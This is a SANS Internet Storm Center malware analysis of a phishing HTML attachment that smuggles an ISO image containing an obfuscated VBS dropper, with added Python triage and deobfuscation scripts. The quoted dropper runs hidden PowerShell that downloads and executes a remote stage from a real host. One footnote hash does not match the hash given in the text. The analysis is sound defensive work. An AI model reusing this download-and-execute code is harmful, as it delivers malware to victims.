SANS Internet Storm Center (SANS ISC)
Malicious ISO Embedded in an HTML Page

Published: 2022-01-28
Last Updated: 2022-01-28 05:34:08 UTC
by Xavier Mertens (Version: 1)

I spotted an interesting phishing email. As usual, the message was delivered with a malicious attachment, in this case a simple HTML page called “Order_Receipt.html” (SHA256: a0989ec9ad1b74c5e8dedca4a02dcbb06abdd86ec05d1712bfc560bf209e3b39) with a low VT score of 5/59 [1]. Because it is a text file, it looks less suspicious. When the page is opened in the victim's browser, it displays a simple message and offers the victim an ISO file to download:

The beginning of the page is filled with junk text that is not displayed:

<center>
<p> <p style='display:none;font-size:0px;'>In modern times a starter can hard
...

This is probably meant to defeat basic security controls that inspect only the very beginning of a file. The ISO file is embedded in a JavaScript function and, as usual, Base64-encoded. Once decoded, the payload (SHA256: 7c1aac4e785f82b997cf5252925c90252c1af1262283b5edbf7f4113c74e251e) has a VT score of 10/55 [2]. Interestingly, the HTML file is brand new, but according to VT the ISO file is already two months old!
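As an added illustration of how to triage such an attachment (my own example script, not the diary's or the attacker's code): it locates long Base64 literals inside `<script>` blocks, decodes them, classifies the result by magic bytes (an ISO 9660 image carries `CD001` at offset 0x8001, the start of sector 16) and measures how much text is parked in `display:none` elements. The HTML and the ISO-shaped blob are constructed inline so the script runs offline; all function names are mine.

```python
import base64
import binascii
import hashlib
import re

B64_RE = re.compile(r'[A-Za-z0-9+/]{512,}={0,2}')          # long Base64 literal
SCRIPT_RE = re.compile(r'<script[^>]*>(.*?)</script>', re.I | re.S)
HIDDEN_RE = re.compile(r'<(\w+)[^>]*display\s*:\s*none[^>]*>(.*?)</\1>', re.I | re.S)

# (offset, magic, label); ISO 9660 keeps its primary volume descriptor in sector 16
MAGICS = [
    (0, b'MZ', 'PE executable'),
    (0, b'PK\x03\x04', 'ZIP/OOXML'),
    (0, b'%PDF', 'PDF'),
    (0x8001, b'CD001', 'ISO 9660 image'),
]


def identify(blob):
    """Cheap file-type check on magic bytes; 'unknown' if nothing matches."""
    for offset, magic, label in MAGICS:
        if blob[offset:offset + len(magic)] == magic:
            return label
    return 'unknown'


def hidden_text_length(html):
    """Characters parked inside display:none elements (the junk prefix the
    diary describes). Heuristic regex, not a full HTML parser."""
    return sum(len(m.group(2)) for m in HIDDEN_RE.finditer(html))


def extract_payloads(html):
    """Decode every long Base64 literal found inside <script> blocks and describe it."""
    findings = []
    for script in SCRIPT_RE.findall(html):
        for m in B64_RE.finditer(script):
            try:
                blob = base64.b64decode(m.group(0), validate=True)
            except (binascii.Error, ValueError):
                continue                      # not Base64 after all
            findings.append({'size': len(blob), 'type': identify(blob),
                             'sha256': hashlib.sha256(blob).hexdigest()})
    return findings


def build_fake_iso():
    """Constructed stand-in for the ISO: 16 empty 2048-byte sectors, then a sector
    starting with a primary volume descriptor header (type 1, 'CD001', version 1)."""
    return bytes(0x8000) + b'\x01CD001\x01' + bytes(2048 - 7)


FAKE_ISO = build_fake_iso()

# Constructed HTML in the shape the diary describes: hidden junk text first, a short
# visible message, then the image as a Base64 string inside a JavaScript function.
# The code that would hand the decoded bytes to the browser is deliberately omitted.
SAMPLE_HTML = (
    "<center><p style='display:none;font-size:0px;'>" + "junk text " * 200 + "</p>"
    "<p>Your order receipt is ready, download it below.</p></center>\n"
    "<script>\nfunction getFile() { return \"" + base64.b64encode(FAKE_ISO).decode() + "\"; }\n"
    "</script>\n"
)


if __name__ == '__main__':
    print('hidden text chars:', hidden_text_length(SAMPLE_HTML))
    for f in extract_payloads(SAMPLE_HTML):
        print(f"{f['type']:16} {f['size']:8d} bytes  sha256={f['sha256']}")
```

The signals worth alerting on are the ones the diary points at: a text attachment whose visible body is tiny, a large hidden prefix, and a decoded blob carrying an executable or disk-image signature. Hash the decoded payload rather than the HTML wrapper, since the wrapper is freshly generated for each campaign while the payload may already be known.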

Most Windows systems today can open ISO files without extra software, but this one is not formatted in NTFS and cannot be mounted by a stock Windows 10:

Once mounted, the ISO image contains only one file, a VBS script:

remnux@remnux:/MalwareZoo/20220127$ sudo mount -o ro APVSTYS43574.iso /tmp/iso
remnux@remnux:/MalwareZoo/20220127$ ll /tmp/iso
total 23
dr-xr-xr-x  1 root root  2048 Nov 12 10:15 ./
drwxrwxrwt 24 root root 20480 Jan 27 15:31 ../
-r-xr-xr-x  1 root root   807 Nov 12 10:15 APVSTYS43574.vbs*

The VBS script (SHA256:ddb517300a9f93fad769e003cb9d3cfeb66231c1ff8a359ff39ddb2c07ff10e7) is unknown on VT. It is obfuscated but easy to decode:

AOKO = ("t.S")
KITK = ("p"+AOKO+"h")
OEWM = ("i"+KITK+"el")
VURQ = ("Scr")
Set RCLD = CreateObject("W"+VURQ+OEWM+"l")
ZCZI = "mm"
HBMV = "pow"
MNGZ = "ell"
VADV = "sh"
VEIF = " -Co"
OLMG = "er"
OQGT = "and "
UYFU = "[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname"
JNUZ = "((New-Object Net.WebClient),'Dow^!loadStri^!g'.replace('^!','n'),[Microsoft.VisualBasic.CallType]::Method,"
VORR = "'++++++++++++++++++++++++###################'.Replace('++++++++++++++++++++++++','https://cozumrekla').Replace('###################','mkayseri.com/.Fainl.txt')"
WJKC = ")|IEX;[Byte[]]"
OLHB = "$f=[Microsoft.VisualBasic.Interaction]::CallByname"
RCLD.Run HBMV+OLMG+VADV+MNGZ+VEIF+ZCZI+OQGT+UYFU+JNUZ+VORR+WJKC+OLHB,0

It's pretty easy to understand: the command is assembled by concatenating small strings, and a few characters are replaced at runtime (for example, '^!' becomes 'n' to rebuild 'DownloadString'). The VBS script tries to download the next stage from hxxps://cozumreklamkayseri[.]com/.Fainl.txt, but the site is down. I found its last known IP address thanks to passive DNS services, but the site does not serve the malicious payload anymore...
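To make that decoding step reproducible, here is a small static deobfuscator for this style of VBS dropper. It is added here and is not part of the diary or of the malware: it walks the assignments, concatenates the string fragments, resolves the PowerShell `.Replace()` chains statically and reports any URLs in defanged form. The sample input is the script quoted above; the `deobfuscate`, `resolve_powershell_replaces` and `extract_urls` names are mine.

```python
import re

# Sample input: the obfuscated VBS dropper quoted in the diary, embedded verbatim.
SAMPLE_VBS = r'''AOKO = ("t.S")
KITK = ("p"+AOKO+"h")
OEWM = ("i"+KITK+"el")
VURQ = ("Scr")
Set RCLD = CreateObject("W"+VURQ+OEWM+"l")
ZCZI = "mm"
HBMV = "pow"
MNGZ = "ell"
VADV = "sh"
VEIF = " -Co"
OLMG = "er"
OQGT = "and "
UYFU = "[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname"
JNUZ = "((New-Object Net.WebClient),'Dow^!loadStri^!g'.replace('^!','n'),[Microsoft.VisualBasic.CallType]::Method,"
VORR = "'++++++++++++++++++++++++###################'.Replace('++++++++++++++++++++++++','https://cozumrekla').Replace('###################','mkayseri.com/.Fainl.txt')"
WJKC = ")|IEX;[Byte[]]"
OLHB = "$f=[Microsoft.VisualBasic.Interaction]::CallByname"
RCLD.Run HBMV+OLMG+VADV+MNGZ+VEIF+ZCZI+OQGT+UYFU+JNUZ+VORR+WJKC+OLHB,0
'''

SET_RE = re.compile(r'^Set\s+(\w+)\s*=\s*CreateObject\((.*)\)\s*$', re.I)
CALL_RE = re.compile(r'^(\w+)\.(\w+)\s+(.*)$')
ASSIGN_RE = re.compile(r'^(\w+)\s*=\s*(.*)$')
PS_REPLACE_RE = re.compile(r"'([^']*)'\.[Rr]eplace\('([^']*)','([^']*)'\)")
URL_RE = re.compile(r"https?://[^\s'\")|;]+")


def tokenize(expr):
    """Split a VBS concatenation into ('str', text) / ('var', name) tokens.
    Whitespace, parentheses and '+' are dropped: every token gets concatenated."""
    tokens, i = [], 0
    while i < len(expr):
        c = expr[i]
        if c in ' \t()+':
            i += 1
        elif c == '"':
            buf, j = [], i + 1
            while True:                          # VBS escapes a quote by doubling it
                k = expr.index('"', j)
                buf.append(expr[j:k])
                if expr.startswith('""', k):
                    buf.append('"')
                    j = k + 2
                else:
                    break
            tokens.append(('str', ''.join(buf)))
            i = k + 1
        else:
            m = re.match(r'[A-Za-z_]\w*', expr[i:])
            if not m:
                raise ValueError(f'unexpected {c!r} in {expr!r}')
            tokens.append(('var', m.group(0)))
            i += m.end()
    return tokens


def evaluate(expr, env):
    """Resolve a concatenation against the variables assigned so far."""
    return ''.join(val if kind == 'str' else env[val] for kind, val in tokenize(expr))


def resolve_powershell_replaces(text):
    """Statically apply 'literal'.Replace('a','b') chains so split cmdlet
    names and URLs reappear as plain strings."""
    while True:
        new = PS_REPLACE_RE.sub(
            lambda m: "'" + m.group(1).replace(m.group(2), m.group(3)) + "'", text)
        if new == text:
            return text
        text = new


def deobfuscate(vbs):
    """Walk the script top to bottom and return (ProgID, method, decoded argument)
    for every method call made on a CreateObject() handle."""
    env, objects, calls = {}, {}, []
    for line in (l.strip() for l in vbs.splitlines()):
        if m := SET_RE.match(line):
            objects[m.group(1)] = evaluate(m.group(2), env)
        elif m := CALL_RE.match(line):
            obj, method, args = m.groups()
            expr, _, window = args.rpartition(',')       # drop a trailing ",0" (window style)
            if not window.strip().isdigit():
                expr = args
            calls.append((objects.get(obj, obj), method,
                          resolve_powershell_replaces(evaluate(expr, env))))
        elif m := ASSIGN_RE.match(line):
            env[m.group(1)] = evaluate(m.group(2), env)
    return calls


def defang(url):
    """hxxp / [.] notation, as used in the diary."""
    scheme, _, rest = url.partition('://')
    host, sep, path = rest.partition('/')
    return scheme.replace('http', 'hxxp') + '://' + host.replace('.', '[.]') + sep + path


def extract_urls(text):
    return [defang(u) for u in URL_RE.findall(text)]


if __name__ == '__main__':
    for progid, method, arg in deobfuscate(SAMPLE_VBS):
        print(f'{progid}.{method}:', URL_RE.sub(lambda m: defang(m.group(0)), arg))
        print('URLs:', extract_urls(arg))
```

Running it resolves the `CreateObject` handle to `WScript.Shell`, rebuilds the `powershell -Command ...` line and pulls out the defanged download URL, without executing anything. The same two passes (concatenation, then static `.Replace()` resolution) cover most droppers of this family; anything the static pass cannot resolve is left in place rather than guessed.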

A pretty nice example of a message that can still bypass many controls today... 

[1] https://www.virustotal.com/gui/file/a0989ec9ad1b74c5e8dedca4a02dcbb6abdd86ec05d1712bfc560bf209e3b39/details
[2] https://www.virustotal.com/gui/file/7c1aac4e785f82b997cf5252925c90252c1af1262283b5edbf7f4113c74e251e/details

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant

Keywords: ISO Phishing